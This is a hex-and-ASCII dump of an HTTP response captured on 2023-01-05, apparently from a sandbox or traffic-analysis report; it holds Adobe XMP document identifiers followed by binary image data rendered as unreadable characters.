35 34 41 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: A3931D</rdf:li> <rdf:li>xmp.did:ECC626C887206811823FD14DE2C8C875</rdf:li> <rdf:li>xmp.did:ECEAAD12712068118B14B79494F62FDF</rdf:li> <rdf:li>xmp.did:ED1FD5E9C762E0119930FB4A4BE239FF</rdf:li> <rdf:li>xmp.did:ED21CB334B86E111882296B3C31954A6</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8168INData Raw: 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 30 38 33 45 42 38 33 43 36 32 42 44 37 43 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 36 30 42 43 37 30 45 42 37 34 42 44 42 30 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 41 41 41 30 38 30 31 46 45 32 37 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 42 30 31 30 32 30 46 30 44 37 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31
                                                                                                                                                                                    Data Ascii: did:F97F1174072068118083EB83C62BD7C1</rdf:li> <rdf:li>xmp.did:F97F117407206811860BC70EB74BDB09</rdf:li> <rdf:li>xmp.did:F97F117407206811871FAAA0801FE274</rdf:li> <rdf:li>xmp.did:F97F117407206811871FB01020F0D7D7</rdf:li> <rdf:li>xmp.did:F97F117407206811871
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8173INData Raw: 32 39 38 43 45 31 31 31 42 38 31 31 45 44 35 45 36 33 34 32 35 32 32 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 41 46 43 31 38 36 37 45 36 36 34 45 30 31 31 38 32 39 34 43 37 43 42 36 39 31 45 42 39 34 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 42 31 32 42 46 37 33 33 43 32 30 36 38 31 31 39 30 32 39 39 46 46 34 41 41 42 43 42 37 35 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 42 31 36 37 38 38 41 34 36 33 42 45 34 31 31 41 44 35 33 38 45 45 30 34 39 32 42 32 34 45 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 42 32 39 43 32 44 35 32 37 32 30 36 38 31 31 38 30 38 33 44 42 41 41 43 38 42 41 30 34 36
                                                                                                                                                                                    Data Ascii: 298CE111B811ED5E63425221</rdf:li> <rdf:li>xmp.did:FAFC1867E664E0118294C7CB691EB94C</rdf:li> <rdf:li>xmp.did:FB12BF733C20681190299FF4AABCB75E</rdf:li> <rdf:li>xmp.did:FB16788A463BE411AD538EE0492B24EE</rdf:li> <rdf:li>xmp.did:FB29C2D5272068118083DBAAC8BA046
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8189INData Raw: 35 36 2d 38 39 36 31 2d 34 34 37 64 2d 38 62 30 36 2d 66 63 38 65 35 37 33 62 31 38 35 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 39 35 36 31 33 35 66 2d 61 32 39 39 2d 32 30 34 61 2d 39 63 33 36 2d 63 30 37 32 34 36 65 64 63 61 34 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 39 64 37 63 35 31 32 2d 61 31 33 35 2d 30 62 34 31 2d 39 31 63 62 2d 36 31 33 31 61 65 62 30 35 32 62 65 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 39 65 36 63 34 61 66 2d 61 31 63 34 2d 34 65 64 30 2d 61 64 34 33 2d 39 38 38 61 36 38 38 61 39 66 65 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 61 30 37 63 33 61 32 2d 30 39 32 30
                                                                                                                                                                                    Data Ascii: 56-8961-447d-8b06-fc8e573b1851</rdf:li> <rdf:li>xmp.did:b956135f-a299-204a-9c36-c07246edca47</rdf:li> <rdf:li>xmp.did:b9d7c512-a135-0b41-91cb-6131aeb052be</rdf:li> <rdf:li>xmp.did:b9e6c4af-a1c4-4ed0-ad43-988a688a9fe4</rdf:li> <rdf:li>xmp.did:ba07c3a2-0920
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8205INData Raw: 36 35 32 2d 30 63 30 63 2d 34 31 65 37 2d 61 38 30 37 2d 66 39 62 35 30 38 39 63 37 63 34 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 65 63 63 30 33 33 31 64 2d 65 36 31 64 2d 34 34 35 38 2d 61 30 34 63 2d 62 61 38 33 65 36 66 36 38 62 30 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 65 63 65 33 62 35 36 38 2d 34 37 39 39 2d 34 33 31 39 2d 39 62 32 32 2d 36 63 36 62 33 37 32 35 30 62 65 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 65 63 65 36 30 33 37 64 2d 65 65 37 34 2d 34 35 62 30 2d 38 30 37 30 2d 61 65 66 64 34 31 62 30 64 36 62 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 65 64 35 30 65 61 35 31 2d 36 33 63
                                                                                                                                                                                    Data Ascii: 652-0c0c-41e7-a807-f9b5089c7c43</rdf:li> <rdf:li>xmp.did:ecc0331d-e61d-4458-a04c-ba83e6f68b02</rdf:li> <rdf:li>xmp.did:ece3b568-4799-4319-9b22-6c6b37250bed</rdf:li> <rdf:li>xmp.did:ece6037d-ee74-45b0-8070-aefd41b0d6b3</rdf:li> <rdf:li>xmp.did:ed50ea51-63c
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8212INData Raw: c5 8b d6 8d c4 95 45 3b 05 52 06 86 92 52 0d 90 85 fb 55 a4 18 b5 6b 1f 95 41 8d 31 4c c3 f5 1e b4 0e 48 d7 dd 7a 99 19 09 ae 47 c2 84 11 a1 05 d0 de e3 a5 59 25 4d 09 54 b9 a4 d9 04 89 71 46 07 ea a8 c9 6d 50 dc c0 37 4a 68 2c 35 fa 7f 55 32 32 20 9b e9 40 a6 40 74 bd 03 4a 06 89 d0 d3 e8 44 6c 27 c2 82 10 38 ab 48 68 51 3d bb d0 48 47 7a 62 81 0c 09 bd 04 58 d8 5f ce 81 0a 55 f5 a0 68 2b 5c eb eb 40 08 65 bf 4a 68 62 2d 6a 20 42 d1 2c 2f 6a 76 25 01 b7 a5 44 43 47 ad 36 20 f4 b5 20 05 ad d2 80 68 1b 6e 75 a6 03 a9 15 f4 a4 f4 26 ab 24 c8 e1 b7 51 71 50 6c 9a a4 32 74 51 5c dc f6 b5 42 cc b1 22 d5 22 be be 9e 95 54 97 f5 24 a4 3d 88 d4 d4 5b 1a a8 0e 3e b7 e9 44 8f 60 ea 63 7a f4 a4 ec 4a 09 26 35 8b af 51 d2 a3 32 37 a1 11 de df 51 d4 d4 d2 21 ba 08 6e
                                                                                                                                                                                    Data Ascii: E;RRUkA1LHzGY%MTqFmP7Jh,5U22 @@tJDl'8HhQ=HGzbX_Uh+\@eJhb-j B,/jv%DCG6 hnu&$QqPl2tQ\B""T$=[>D`czJ&5Q27Q!n
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8228INData Raw: 96 a6 10 22 dd e8 18 0a d0 20 c0 1d 45 01 01 ed 3f e3 40 40 ab 77 a1 e8 34 02 3b 50 98 c6 c8 eb 40 98 44 d0 29 11 6b ea 28 22 fa 05 6d 2d 42 18 41 3a 93 d2 99 14 0d 80 6a 35 a2 47 01 2a f7 34 30 4a 05 81 7a 43 40 23 ad 04 98 d3 0d 29 bd 48 59 08 2b e9 de a4 88 86 07 4a 18 d3 0f 6d ba 7e 55 19 25 02 08 fc a9 a2 0d 05 b7 b5 0c 88 0f a5 24 10 28 25 cf ca 89 25 03 81 2d 48 98 ad 96 b5 20 da 11 16 a6 11 02 6d ae b4 11 91 24 5f 41 40 36 26 dd a8 17 41 24 5c da a4 02 6d ad 12 20 f6 9b de 89 13 42 82 d2 64 90 56 ed 43 06 26 c4 8b 1a 18 a0 16 be 96 d6 90 40 4c bd 8d 34 c1 89 b7 7a 24 88 b2 05 b4 a0 98 05 20 91 3b 7f 3a 08 82 de 95 29 13 d0 22 97 d4 f5 a5 30 38 05 ac 29 a0 81 16 02 80 91 5b 3d 7a 54 42 20 48 5f 41 4d 80 76 d2 e3 bd 12 10 28 2d e9 0e 05 28 1d 45 03
                                                                                                                                                                                    Data Ascii: " E?@@w4;P@D)k("m-BA:j5G*40JzC@#)HY+Jm~U%$(%%-H m$_A@6&A$\m BdVC&@L4z$ ;:)"08)[=zTB H_AMv(-(E
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8244INData Raw: 7b 54 c8 3b 0d 33 9e 9d 69 a5 04 66 46 18 d4 92 23 23 6c 6e 75 a6 84 36 ed 6d 05 31 36 32 de 95 24 45 89 b6 ba 53 10 82 2d d0 50 30 b5 3a d0 01 91 4c 50 1f 53 48 1a 08 8e e6 81 09 22 fa d0 02 49 ec 29 a4 36 32 7f 8d 31 31 26 e2 81 03 f8 d0 48 2b 5a 81 00 03 40 98 46 9a 10 93 7e fd 29 80 92 3b 0a 3a 00 08 eb 6e b4 00 46 81 03 ff 00 1a 06 11 14 00 92 6d a8 a6 26 11 3d 2d 40 9b 12 c0 7e a3 d6 80 62 4d 8d 34 c4 00 28 60 82 b6 b6 a4 01 91 7a 92 13 13 fd d4 02 05 bb 1e 94 12 90 52 09 07 c0 d0 88 b1 27 d2 a4 44 2a 07 20 22 dd 68 1c 0a db 4a 43 68 63 e3 4a 24 72 0b 69 ad 21 f6 12 01 a9 10 61 5a 81 04 17 5a 64 93 01 1f 95 02 61 5b b1 14 00 ad 9a 52 92 5b 42 e9 47 50 0b 53 4c 8b 0b fb e8 09 05 a8 00 11 a5 e9 40 80 68 13 62 4d 31 89 3d 4d 20 11 d7 a5 4b a0 98 2d d2
                                                                                                                                                                                    Data Ascii: {T;3ifF##lnu6m162$ES-P0:LPSH"I)6211&H+Z@F~);:nFm&=-@~bM4(`zR'D* "hJChcJ$ri!aZZda[R[BGPSL@hbM1=M K-
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8252INData Raw: 84 09 b5 32 10 11 14 00 44 50 34 20 8f 5a 08 b4 1f ce 81 86 35 a0 40 b7 51 44 8c 6c fc 6a 55 10 9b 5b 4a 60 c3 16 e8 68 60 83 22 d4 a4 62 58 5a 84 c5 22 6d 4c 41 91 40 d0 9f 9d 00 c2 a0 05 03 40 83 14 00 09 a0 61 50 30 5e d4 00 56 bd 04 41 b7 bf 6a 06 2a da 50 1d 44 91 da 81 89 22 82 22 47 a0 a0 00 7e 34 d0 80 01 e9 44 8c 1a f5 a2 49 40 36 de 91 16 22 c7 bd 4c 42 6d e9 40 04 2e 28 00 ef e9 d6 90 00 9b 53 01 06 80 07 5e 94 88 a4 39 b6 d4 22 63 64 53 00 85 02 13 b0 75 a2 40 6c f5 b5 34 31 56 f5 a4 c4 00 35 26 80 60 e8 7e 14 00 96 6b 74 a1 0a 44 33 5e 9c 00 de c2 7a 50 00 db eb 40 2d 00 2c 3b 50 02 18 81 4c 8e e1 a3 ad 48 8b 11 40 82 db 44 8c 41 d7 4a 92 13 43 77 a6 21 2c 3b d0 87 23 4d d7 bd 48 83 0a f4 c2 60 23 ae b4 03 1b b7 f1 a6 20 88 ef 40 98 9d bd a8
                                                                                                                                                                                    Data Ascii: 2DP4 Z5@QDljU[J`h`"bXZ"mLA@@aP0^VAj*PD""G~4DI@6"LBm@.(S^9"cdSu@l41V5&`~ktD3^zP@-,;PLH@DAJCw!,;#MH`# @
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8268INData Raw: a1 b0 f4 9e 33 2a a0 61 fa 87 5a 85 79 c8 93 e1 34 8a 2c ae 3e 5c 3b 7b c2 d7 bd ab 5e 3c cb 27 43 2d f0 ba 75 21 94 f4 a9 c9 5c 0e 26 3b c8 48 45 27 f0 a4 ee 91 25 47 60 8c 66 33 b5 c1 07 e3 44 cf 40 6a 04 90 6f 6a 62 91 40 5b a5 21 a0 ed 6d 68 1f 50 3d 98 5a d6 a1 68 26 32 62 1e b4 e4 84 01 a3 00 68 68 90 da 35 b6 d5 39 14 05 6e f4 a4 20 2b 5a 89 10 54 48 e3 40 15 b5 12 36 82 db 4d 08 2b 5b e1 40 a0 23 e9 40 30 88 ef 40 05 6a 62 62 48 14 26 21 24 53 40 35 6e e6 a4 02 48 fc e8 13 13 d3 a5 02 0b e7 52 00 1b da 84 01 7f 7d 00 26 dd 8d 02 0e 92 63 12 41 1a d3 90 13 b3 d2 89 14 05 b7 d6 89 00 c2 fa d2 90 48 05 7b 1e d4 48 d8 5b 47 6a 62 80 b6 f7 a5 21 01 6d a6 31 1f 01 40 98 9b 5a a5 24 60 49 a0 41 05 37 b5 12 49 20 14 a5 20 d0 45 3a db bd 09 8a 02 0a 68 08
                                                                                                                                                                                    Data Ascii: 3*aZy4,>\;{^<'C-u!\&;HE'%G`f3D@jojb@[!mhP=Zh&2bhh59n +ZTH@6M+[@#@0@jbbH&!$S@5nHR}&cAH{H[Gjb!m1@Z$`IA7I E:h
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8284INData Raw: c6 ac 75 f0 28 96 c5 98 26 cb 00 13 12 b6 e0 58 db 50 2f 50 95 42 16 4c 93 93 c6 e7 3a ae 6b 46 cc 88 db 46 d2 0d c7 c6 dd 6a aa 72 69 31 3a 96 2e 92 33 06 49 c5 8c 43 2c 5b 24 fe 50 41 37 bf af ad 3b 57 73 94 c4 d9 2c a2 e5 8b 05 ba af ea 3d 06 ef 81 35 15 77 5e e4 c8 92 bc b1 b7 b6 a9 b7 db 6b 15 26 c4 8b 68 68 ac 3d 48 49 0a 5d 45 80 21 89 e8 08 17 fc f5 ad 14 70 39 2b e4 32 df a5 94 db a7 6a ba 13 43 68 76 06 8b 55 7b 96 16 be a3 4f c6 ab b4 ae 84 7e 04 d8 b2 21 46 58 dc 14 3d ae 2c 7e 5a 54 2d 56 4d 5a 3a 93 94 a3 bf bf 12 ef ea 09 bd ad 50 b4 f4 2c 0a 42 cc 87 50 1c 90 34 1d 3d 3d 68 56 49 8d b5 05 7e 62 4a 55 51 00 55 0a 57 53 7b 9f 5b f6 ab 69 64 8a da d0 a9 4c 69 11 ac c8 08 ee 5b 4f ce ae b5 93 2b 68 59 c4 37 25 ec 37 d8 d8 1e bf 86 87 f3 a8 ef
                                                                                                                                                                                    Data Ascii: u(&XP/PBL:kFFjri1:.3IC,[$PA7;Ws,=5w^k&hh=HI]E!p9+2jChvU{O~!FX=,~ZT-VMZ:P,BP4==hVI~bJUQUWS{[idLi[O+hY7%7
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8292INData Raw: c6 9c 91 e6 c8 6c 7d 55 43 47 fd be 15 2a a9 2b 76 68 8a b9 ca 01 12 25 f7 7f cd 7f e0 69 ec 05 90 ff d7 f7 9e c2 0d 7b 49 3c c3 0b 6d 12 20 f6 d0 0c 2d b4 0a 00 52 f4 02 0b 6d e8 08 0b 6d 39 22 18 5b 50 01 6d bd 12 10 19 4a 24 20 1b 05 12 10 00 94 f7 04 00 af 61 4c 8b 0b 6f a7 4a 52 10 2b 6d b4 ef 42 63 81 3b 7b 1a 72 20 5a 80 41 6d a1 08 56 de d4 c0 16 f4 a0 01 b6 80 0f 6f 6a 00 1b 68 00 b6 fa d0 00 0b 40 00 8b 50 00 da 28 91 00 8d 68 40 0d be b4 e4 41 6d a9 0c 2b 5a 80 06 d3 4a 44 26 d4 c6 15 a8 22 1d b7 50 31 3b 7d 29 c8 9a 0f 6d 29 16 d0 b6 d3 90 81 4b 1e e3 b4 54 5b 82 71 24 85 c4 dc 42 29 37 35 0f 54 92 c3 22 5b 12 55 d1 94 8a 3d 54 c4 f0 bf 01 02 2b 11 be 9e e9 e8 0a a1 b4 00 9b 47 42 bf 76 3d b3 d0 52 44 ea c1 82 f4 3d e9 5a e9 8e b4 69 96 32 47
                                                                                                                                                                                    Data Ascii: l}UCG*+vh%i{I<m -Rmm9"[PmJ$ aLoJR+mBc;{r ZAmVojh@P(h@Am+ZJD&"P1;})m)KT[q$B)75T"[U=T+GBv=RD=Zi2G
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8308INData Raw: f5 ea 3a d5 95 5b d1 55 b4 27 e2 62 34 4a b2 ce a5 af ad 8b 6a 07 c6 aa b5 a7 44 35 58 52 25 26 72 92 e5 47 18 17 27 69 17 b3 5b e3 4e d8 f5 ea 3b 21 b8 13 23 3b 1c b6 60 58 87 5d 06 ff 00 c2 c7 fb ea 7f 4a d1 05 6c da 81 38 79 10 cb 8f 3c 3c 88 66 89 5b 74 48 01 00 9b 5b 51 73 72 3d 6b 45 5c 22 15 b7 62 83 1f 0d 5c b7 b4 59 24 63 ba c4 69 6e c3 e1 51 cb 68 44 5d 25 12 d1 c4 2e c2 6b a8 04 03 61 a7 e3 da aa 96 d6 84 13 86 59 ac ac db e0 4b 88 ef 7b 8d 0e bd aa b8 2f ad a4 87 90 85 65 61 09 7d d6 b1 07 a5 ed d0 55 8b 55 a8 ae 86 b8 a2 20 ba 32 95 76 25 9b 71 fa 47 e7 fe 15 1c ae 4a e8 89 9b 95 ec 64 17 46 20 0b 11 62 3f be a2 b4 27 04 3c d8 c1 65 59 1a d7 b8 00 1b 0f f3 d2 ae c7 94 4f a9 61 c5 c5 fb 81 91 8c 0a a8 54 0d 76 3a 1e d6 a9 75 25 4b 11 cc 01 a2
                                                                                                                                                                                    Data Ascii: :[U'b4JjD5XR%&rG'i[N;!#;`X]Jl8y<<f[tH[Qsr=kE\"b\Y$cinQhD]%.kaYK{/ea}UU 2v%qGJdF b?'<eYOaTv:u%K
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8324INData Raw: f4 f8 54 ed 18 b5 92 bd 92 5b e5 18 a1 46 c1 65 0f a1 0c 09 05 77 76 1f 21 6f ce a8 a5 1d be a2 4d 2e 84 44 c8 7c 25 49 63 8d 99 48 b2 95 1a 0f 9f 70 05 57 7a 6e 70 56 d6 ce c5 a4 13 c7 92 cb bb fa 84 ee 22 df ea b7 f8 0a cf 6c 6e a4 ea d5 8c cf 32 a9 1c a8 c4 33 59 86 8a 7e 91 73 d0 db e5 5a f0 a6 d3 f8 14 66 ac 3d 0c 7f 95 61 03 13 64 e2 b6 d4 1b 49 17 fa 41 23 5b 69 a0 ad dc 1b f6 66 6c f5 d3 42 c7 c5 f9 23 9f 02 0c bb 7b d1 10 84 da e4 8e dd 3a 55 7c cc 3b 2d a1 67 1b 23 b2 d4 bf e5 78 c1 9b 88 cd 28 11 31 52 a8 16 db 8d bb 0e 95 93 8f 9b 65 a0 b7 25 25 49 ce 13 21 e3 86 58 72 15 9b 23 fe 99 56 bd c0 e8 36 d8 0b 7f 6b d7 5e c9 5b a1 86 b6 ec 76 fc 28 93 23 0e 29 11 88 21 15 10 13 7b 69 ae a7 b5 79 dc 9b a9 76 75 29 59 52 56 72 bc 5a 61 c0 cf 8c ff 00
                                                                                                                                                                                    Data Ascii: T[Fewv!oM.D|%IcHpWznpV"ln23Y~sZf=adIA#[iflB#{:U|;-g#x(1Re%%I!Xr#V6k^[v(#)!{iyvu)YRVrZa
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8331INData Raw: 4a a3 27 2e d7 f2 2d af 1d 57 a1 26 40 25 17 23 e9 5e db 6d 55 26 d1 27 4d 0a 53 36 db a1 6b 7a 11 a1 02 af da cc b6 2a 72 38 78 f9 19 44 cd 2c 81 47 55 5b 0b fe 63 4a be 9c 97 45 05 1e 9e e6 35 fe d9 34 4c 13 08 aa c2 a6 e1 0a 96 3f 89 06 9f ad 5b 6a c9 ac 5a ca 24 ff 00 58 64 45 0c cc a1 6d bb 51 6b fc aa 30 a2 51 62 d0 95 26 1d df f7 78 d9 25 8a 82 36 76 f9 54 2b 6e cd 16 5b 14 f4 65 0e 3f 12 d9 19 42 69 0e f2 da be b6 b7 71 a5 5d 7c 8a b5 82 aa e1 dc cb 9e 6a 33 fb 67 86 4f 70 81 a0 08 06 a3 f1 23 4a a7 8f f9 a4 9e 4c 69 18 78 78 88 9f 11 f2 64 52 f2 ee b0 b0 b9 07 e5 5d 07 9d ab 47 63 33 aa 65 5a cf 1e 34 65 2c 51 85 ee a5 7a fe 42 ad 75 dc 24 d2 28 5c cb 99 2b 38 4b c4 bd 59 54 9f ef b5 6a d2 8a 0a 5c d9 e8 4f 8c 91 1b 3b 8d 54 77 1d aa 9b 75 1c 15
                                                                                                                                                                                    Data Ascii: J'.-W&@%#^mU&'MS6kz*r8xD,GU[cJE54L?[jZ$XdEmQk0Qb&x%6vT+n[e?Biq]|j3gOp#JLixxdR]Gc3eZ4e,QzBu$(\+8KYTj\O;Twu
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8347INData Raw: 7a d3 c5 7f 51 fd 45 16 ae dd 04 45 9d 8f cd c4 b1 95 63 2d b5 3b 6f 63 43 a3 c2 e7 b1 16 c6 a3 e1 73 31 72 7f f6 f1 16 83 6f eb 73 b4 7f 7d e9 be 45 5a d7 a9 25 27 ff d3 e8 f7 b9 0c a7 ae ba 57 d0 8f 19 1a 88 69 c4 63 43 6b f4 fc 28 55 92 2f 41 43 21 c2 29 8d be b5 37 14 9d 75 04 c2 f7 66 c9 3e dc 2a cc e7 bf c2 88 55 d4 1b 6f 44 4c 97 16 48 91 41 bb 90 3b 0e 95 5a ba 65 8d 34 87 64 cd 30 44 b1 86 6d dd cf 4b 7c fd 69 56 9b 98 f7 ed 45 34 b9 92 48 2e c7 53 ea 7b 56 8a e3 48 a7 7c 8d fe e0 aa ed 8d 88 5e e0 53 da 45 db c0 5c 39 8c 8a c8 7a 1b 69 4a d8 d3 1a bb 4a 03 32 33 bf b4 36 fd 43 a5 11 1a 89 39 10 62 2f b4 0f a8 de d6 b5 3d d0 36 a4 97 ba 38 16 e0 10 e0 91 da d6 aa d4 d9 8e af 68 e1 cd 8c c6 8b a8 65 fe 52 01 14 b6 39 24 f2 26 84 9c b1 21 1a 11 d8
                                                                                                                                                                                    Data Ascii: zQEEc-;ocCs1ros}EZ%'WicCk(U/AC!)7uf>*UoDLHA;Ze4d0DmK|iVE4H.S{VH|^SE\9ziJJ236C9b/=68heR9$&!
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8363INData Raw: a2 59 c2 69 22 f7 50 96 b7 5d 6b 3f ae 95 b5 20 f2 11 44 91 62 d8 dc d8 8b 10 35 35 a2 1b 2e 56 55 21 cd 2a ca 49 16 b5 fa 6a 0d 49 11 b5 a4 4c 2a cb a8 fd 22 fd 85 36 d0 ab a1 37 d8 0a 85 99 88 52 2f db 4f ca a0 df 81 64 41 9d c7 89 5f 24 fb ac a9 8c a4 90 63 ea 7e 77 15 7e 4b b5 5d 3a 99 53 87 a1 67 3c 13 b1 56 c5 60 b0 8d 4d fe ad 3f 03 59 f1 dd 47 d5 d4 9a 96 88 9b 5c 12 48 b8 f5 b5 87 f9 d5 c9 a2 55 25 22 05 5d cd 76 1f 8f fc 6a b6 e4 2a a1 14 7c b6 1b e5 c4 d1 46 2c 7e 44 ff 00 e1 5a 70 e4 54 64 6c a4 ad e0 30 17 10 ba 44 4e eb fd 5b fa 5f e4 45 aa de 55 e5 15 53 1c 32 2f 23 c2 cd 26 50 cc 8c a8 87 ab 00 76 b7 c2 dd a9 e2 e4 57 6c 3e a2 bd 1f 54 7f ff d6 ec 78 32 62 e5 22 a4 c5 44 e5 6e c8 41 04 7e 15 e9 72 64 bd 1c ae 87 9f a5 6a d6 a4 b4 c4 c2 2c
                                                                                                                                                                                    Data Ascii: Yi"P]k? Db55.VU!*IjIL*"67R/OdA_$c~w~K]:Sg<V`M?YG\HU%"]vj*|F,~DZpTdl0DN[_EUS2/#&PvWl>Tx2b"DnA~rdj,
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8371INData Raw: 05 c0 b0 63 f2 ea 00 ac ee fb d9 37 5d a5 34 b9 20 16 b2 12 6c 6c 01 37 d7 ad 4a 03 a0 f8 cd 94 7b 70 ad d4 8e b7 5d 2d d6 c7 fb 5e 9c 77 05 67 d1 05 91 99 1b ee 69 21 08 91 9d 4a af 5b d3 ad 1a ee 46 d7 92 4e 00 9a 12 b3 41 20 68 5c 58 20 7b 37 e2 3b 55 59 6c ad a7 71 e3 4c 4e 44 31 e2 89 64 1e e4 f9 32 02 2f bb 40 3b 68 b6 fe fa 29 66 e3 b2 1d ab 05 54 01 96 c1 ed 12 f5 3b 0f d5 fd ff 00 f8 d5 b6 b2 20 93 e8 29 f7 3c cb b0 df 68 dc a1 ba fc cf c7 d0 52 ad 92 1a 5a 8d 0c cf 72 20 99 0d ba 44 72 ca 46 84 00 7b fc a9 3a f8 12 76 94 30 93 34 81 e4 84 30 de 6d 64 5e b6 ee 49 a6 d6 d2 09 00 a3 28 b2 3b 86 24 dc 06 0b 71 ff 00 35 e9 6f 91 ba c0 e6 56 f1 18 0a 96 5f f5 77 17 eb e9 4a ad 49 63 98 18 40 30 a4 08 b7 2e e0 96 22 e0 db d6 de 9f 3a 93 b6 f2 35 d1 81
                                                                                                                                                                                    Data Ascii: c7]4 ll7J{p]-^wgi!J[FNA h\X {7;UYlqLND1d2/@;h)fT; )<hRZr DrF{:v040md^I(;$q5oV_wJIc@0.":5
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8387INData Raw: 72 b6 cf 26 49 0f 8a ce a6 00 b6 fa c3 0b 80 00 ed fe 35 35 86 ae 12 eb dc 82 bb 5a 13 23 ca 8e 63 04 19 e1 bd ad ad 33 05 16 b1 da 3e 92 40 f4 d3 d7 ad ba d5 6e ad 36 d1 25 93 58 18 cc e4 f8 e8 e0 7c 64 8c fb 4b fd 32 9b db 5b 0f a4 2d fa 0b 7c 6f 4e b8 ec de a5 75 86 8c 72 47 89 93 2c 89 8a a8 8a 34 76 20 9d a8 3a eb 7d 09 d2 ff 00 9e b5 ba d6 74 5a bd 48 ec dc cb 47 db c7 a0 8e de d6 3b 1d cc c7 40 41 1e b6 d7 b5 eb 8d 7c be ab 97 af 91 a1 55 55 68 53 f2 19 3f b6 9c 06 42 a5 96 e0 a9 b3 5c 8d 7f f2 a8 ee 7b f7 a9 63 52 89 24 ca 1c 89 79 1c 36 54 c0 27 63 33 97 03 68 62 48 bf af 41 d0 56 ac 55 ad a6 4a ed 66 8d ff 00 8e 3c 63 05 e3 8a 4f 72 76 b2 1f 71 36 80 34 26 c2 f7 3b 6f fa 8d 2b d5 a7 1d 81 2d 0d 07 2b 3b e1 81 2c 97 76 da 15 50 75 3f 32 7b fa 5f
                                                                                                                                                                                    Data Ascii: r&I55Z#c3>@n6%X|dK2[-|oNurG,4v :}tZHG;@A|UUhS?B\{cR$y6T'c3hbHAVUJf<cOrvq64&;o+-+;,vPu?2{_
                                                                                                                                                                                    2023-01-05 07:58:11 UTC8403INData Raw: 33 22 c9 e4 f1 dc 71 8e e9 24 c2 49 09 40 14 ee 1a 93 6b 02 35 bf e5 5d 2c 97 c4 ab 09 ea 51 4a 34 e5 97 d8 5e 4a 67 e4 97 16 38 20 8e 49 99 ca e5 a2 8d c1 50 6a 16 e7 a9 1a 5f b5 eb 35 f8 9b 69 ba 5b 4b b1 72 be ee a6 be 7e 4d 78 fc 5d f8 e2 cc ac ec f2 84 df 73 7b 0b b1 04 e9 f0 b7 5a e6 3c 4e d6 d4 d3 8f 26 da 88 c4 e5 31 4c 69 90 cd 34 58 bb ae 5d 43 43 bf 70 d7 f4 db 42 6d 6d 3a 5e ae 55 b4 c1 1a e6 9e 83 72 73 b9 3e 4f 9a b8 59 57 8b 1f 1d 95 c8 44 28 bb 6f 60 05 c9 d0 da da df d4 9e b5 67 a5 5c 35 dd dd 8b d4 6f a1 6d c8 65 cb 0a 1c 92 15 dc d8 46 0a 33 05 5b 77 00 9f c0 d6 5a 2d ee 3e d2 3b b5 93 29 83 e4 13 73 79 78 dc 52 c8 b1 4c 0e e6 29 dd 7a d9 45 f5 6e a0 8b 8f 9d 6a b7 1f d1 ab b0 27 bd a4 be 65 d4 f8 91 c3 16 46 07 1e ef 14 b7 61 2a 4e a4
                                                                                                                                                                                    Data Ascii: 3"q$I@k5],QJ4^Jg8 IPj_5i[Kr~Mx]s{Z<N&1Li4X]CCpBmm:^Urs>OYWD(o`g\5omeF3[wZ->;)syxRL)zEnj'eFa*N
